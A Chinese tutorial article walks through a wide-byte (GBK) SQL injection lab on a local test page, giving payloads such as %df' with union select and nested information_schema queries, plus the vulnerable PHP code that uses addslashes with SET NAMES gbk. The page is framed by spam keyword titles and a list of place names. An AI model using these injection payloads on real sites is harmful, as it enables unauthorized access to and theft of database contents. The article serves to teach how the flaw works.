中文字幕av专区_日韩电影在线播放_精品国产精品久久一区免费式_av在线免费观看网站

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

Web中寬字節注入攻擊原理的示例分析

發布時間:2021-11-02 17:52:10 來源:億速云 閱讀:182 作者:小新 欄目:開發技術

這篇文章主要為大家展示了“Web中寬字節注入攻擊原理的示例分析”,內容簡而易懂,條理清晰,希望能夠幫助大家解決疑惑,下面讓小編帶領大家一起研究并學習一下“Web中寬字節注入攻擊原理的示例分析”這篇文章吧。

寬字節注入攻擊

寬字節注入攻擊的測試地址:http://127.0.0.1/sqli/kuanzijie.php?id=1。

訪問id=1',頁面返回的結果如圖46所示,程序并沒有報錯,反而多了一個轉義符(反斜杠)。

Web中寬字節注入攻擊原理的示例分析 

圖46 單引號被轉義

從返回的結果可以看出,參數id=1在數據庫查詢時是被單引號包圍的。當傳入id=1'時,傳入的單引號又被轉義符(反斜杠)轉義,導致參數ID無法逃逸單引號的包圍,所以在一般情況下,此處是不存在SQL注入漏洞的。不過有一個特例,就是當數據庫的編碼位GBK時,可以使用寬字節注入,寬字節的格式是在地址后先加一個%df,再加單引號,因為反斜杠的編碼為%5c,而在GBK編碼中,%df%5c是繁體字“連”,所以這時,單引號逃逸成功,報出MySQL數據庫的錯誤,如圖47所示。

Web中寬字節注入攻擊原理的示例分析 

圖47 利用寬字節逃逸單引號的包圍

由于輸入的參數id=1',導致SQL語句多了一個單引號,所以需要使用注釋符來注釋程序自身的單引號。訪問id=1%df'--+,頁面返回的結果如圖48所示,可以看到,SQL語句已經符合語法規范。

Web中寬字節注入攻擊原理的示例分析 

圖48 利用注釋符注釋單引號

使用and 1=1和and 1=2進一步判斷注入,訪問id=1%df' and 1=1--+和id=1%df' and 1=2--+,返回結果如圖49和圖50所示。

Web中寬字節注入攻擊原理的示例分析

圖49 訪問id=1%df' and 1=1--+時頁面的結果

Web中寬字節注入攻擊原理的示例分析 

圖50 訪問id=1%df' and 1=2--+時頁面的結果

當and 1=1程序返回正常時,and 1=2程序返回錯誤,所以判斷該參數ID存在SQL注入漏洞,接著使用order by查詢數據庫表的字段數量,最后得知字段數為3,如圖51所示。

Web中寬字節注入攻擊原理的示例分析 

圖51 獲取數據庫表的字段數

因為頁面直接顯示了數據庫中的內容,所以可以使用Union注入。與Union注入一樣,此時的Union語句是union select 1,2,3--+,為了讓頁面返回Union查詢的結果,需要把ID的值改為負數,結果如圖52所示。

Web中寬字節注入攻擊原理的示例分析 

圖52 結合Union注入

然后嘗試在頁面中2的位置查詢當前數據庫的庫名(database()),語句為:

id=-1%df' union select 1,database(),3--+

返回的結果如圖53所示。

Web中寬字節注入攻擊原理的示例分析 

圖53 獲取database()

查詢數據庫的表名時,一般使用一下語句。

id=-1%df' union select 1,(select table_name from information_schema.tables where table_schema='sql' limit 0,1),3--+

但是此時,由于單引號被轉義,會自動多出反斜杠,導致SQL語句出錯,所以此處需要利用另一種方法:嵌套查詢。就是在一個查詢語句中,再添加一個查詢語句,下列就是更改后的查詢數據庫表名的語句。

id=-1%df' union select 1,(select table_name from information_schema.tables where table_schema=(select database()) limit 0,1),3--+

可以看到,原本的table_schema=‘sql'變成了table_schema=(select database()),因為select database()的結果就是'sql',這就是嵌套查詢,結果如圖54所示。

Web中寬字節注入攻擊原理的示例分析 

圖54 獲取數據庫的表名

從返回結果可以看到,數據庫的第一個表名時emails,如果想查詢后面的的表名,還需要修改limit后面的數字,這里不再重復。使用以下語句嘗試查詢emails表里的字段。

id=-1%df' union select 1,(select column_name from information_schema.columns where table_schema=(select database()) and table_name=(select table_name from information_schema.tables where table_schema=(select database()) limit 0,1) limit 0,1),3--+

這里使用了三層嵌套,第一層時table_schema,它代表庫名的嵌套,第二層可第三層時table_name的嵌套。我們可以看到語句中有兩個limit,前一個limit控制表名的順序。如這里查詢的不是emails表,而是users表,則需要更改limit的值。如圖55所示,后面的操作如Union注入所示,這里不再重復。

Web中寬字節注入攻擊原理的示例分析 

圖55 獲取數據庫字段名

寬字節注入代碼分析

在寬字節注入頁面中,程序獲取GET參數ID,并對參數ID使用addslashes()轉義,然后拼接到SQL語句中,進行查詢,代碼如下。

<?php
error_reporting(~E_WARNING);
$conn = mysqli_connect("localhost","root","root","test");
// 檢測連接
if (mysqli_connect_errno())
{
    echo "連接失敗: " . mysqli_connect_error();
}
mysqli_select_db($conn,'test') OR emMsg("數據庫連接失敗");
mysqli_query($conn,"SET NAMES 'gbk'");
$id = addslashes(@$_GET['id']);
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result = mysqli_query($conn,$sql); 
$row = mysqli_fetch_array($result);
if($row)
{
    echo $row['username'] ." : ". @$row['password'];
}
else 
{
    echo mysqli_error($conn);
}      
?>
</font> 
<?php
echo "<br>The Query String is : ".$sql ."<br>";

?>

當訪問id=1'時,執行的SQL語句為:

select * from users where id='1\''

可以看到單引號被轉義符“\”轉義,所以在一般情況下,是無法注入的,但由于在數據庫查詢前執行了SET NAMES ‘GBK',將編碼設置為寬字節GBK,所以此處存在寬字節注入漏洞。

在PHP中,通過iconv()進行編碼轉換時,也可能存在寬字符注入漏洞。

以上是“Web中寬字節注入攻擊原理的示例分析”這篇文章的所有內容,感謝各位的閱讀!相信大家都有了一定的了解,希望分享的內容對大家有所幫助,如果還想學習更多知識,歡迎關注億速云行業資訊頻道!

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

web
AI

闸北区| 调兵山市| 潍坊市| 邮箱| 茌平县| 历史| 房产| 务川| 闵行区| 虹口区| 兰西县| 葫芦岛市| 民权县| 商丘市| 芜湖市| 阳曲县| 鲁山县| 洛隆县| 固阳县| 金坛市| 方山县| 上杭县| 洛南县| 房产| 修水县| 岚皋县| 司法| 武陟县| 德安县| 曲周县| 抚远县| 灵璧县| 景德镇市| 高要市| 安泽县| 满洲里市| 遵义市| 大渡口区| 万年县| 波密县| 荣昌县|